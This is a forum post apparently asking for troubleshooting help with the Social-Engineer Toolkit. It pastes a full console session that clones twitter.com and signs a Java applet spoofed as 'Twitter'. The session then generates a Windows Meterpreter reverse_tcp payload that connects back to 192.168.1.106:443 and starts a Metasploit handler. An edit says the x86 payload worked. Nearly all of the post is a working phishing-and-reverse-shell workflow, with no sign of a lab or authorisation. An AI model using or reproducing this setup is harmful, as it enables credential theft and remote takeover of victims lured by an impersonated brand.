I have update SET & even Metasploit. The SET version is 2.4.2 and the Codename: 'Renegade'. I have tried different payload for x64 and nothing. below is the console command
Code:
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) Third Party Modules
99) Return back to the main menu.
set> 2
The Web Attack module is a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Victim Web Profiler
9) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack>1
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address for the reverse connection:192.168.1.106
Simply enter in the required fields, easy example below:
Name: FakeCompany
Organization: Fake Company
Organization Name: Fake Company
City: Cleveland
State: Ohio
Country: US
Is this correct: yes
[!] *** WARNING ***
[!] IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk
[!] *** WARNING ***
What is your first and last name?
[Unknown]: Twitter
What is the name of your organizational unit?
[Unknown]: Twitter
What is the name of your organization?
[Unknown]: Twitter
What is the name of your City or Locality?
[Unknown]: Auckland
What is the name of your State or Province?
[Unknown]: CA
What is the two-letter country code for this unit?
[Unknown]: US
Is CN=Twitter, OU=Twitter, O=Twitter, L=Auckland, ST=CA, C=US correct?
[no]: yes
Warning:
The signer certificate will expire within six months.[*] Java Applet is now signed and will be imported into the website
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.twitter.com
[*] Cloning the website: http://www.twitter.com[*] This could take a little bit...[*] Injecting Java Applet attack into the newly cloned website.[*] Filename obfuscation complete. Payload name is: Iwspj6[*] Malicious java applet website prepped for deployment
What payload do you want to generate:
Name: Description:
1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Bind Shell Execute payload and create an accepting port on remote system
5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter
11) SE Toolkit Interactive Shell New custom interactive reverse shell designed for SET
12) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP
13) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec (A/V Safe)
14) Import your own executable Specify a path for your own executable
set:payloads>7
set:payloads> PORT of the listener [443]:443
Created by msfpayload (http://www.metasploit.com).
Payload: windows/x64/meterpreter/reverse_tcp
Length: 422
Options: {"LHOST"=>"192.168.1.106", "LPORT"=>"443"}[*] Generating x64-based powershell injection code...[*] Generating x86-based powershell injection code...[*] Printing the x64 based encoded code...
I erased it because it was trigger a security alert[*] Finished generating shellcode powershell injection attack and is encoded to bypass excution restriction policys...[*] Generating OSX payloads through Metasploit...[*] Generating Linux payloads through Metasploit...[*] Apache appears to be running, moving files into Apache's home
***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************
[--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]
[--] Apache web server is currently in use for performance. [--]
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***
######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 767 exploits - 405 auxiliary - 119 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
=[ svn r14325 updated yesterday (2011.11.30)
[*] Processing src/program_junk/meta_config for ERB directives.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
msf exploit(handler) > [*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler...
I sent an email directly from a Gmail account to another one that why you do not see any email.
Thanks for the assistance
Edit:
Hi everybody,
I was able to solve my problem. I think the problem was regarding the payload I was using before the " Windows Meterpreter Reverse_TCP X64 ". instead of that I used the " Windows Reverse_TCP Meterpreter " and it worked.
So I am glad it worked but it generates a new question? why is the payload designed for the x64 architecture did not work while the x86 did ?
Thanks
SET & Windows 7
Posting Permissions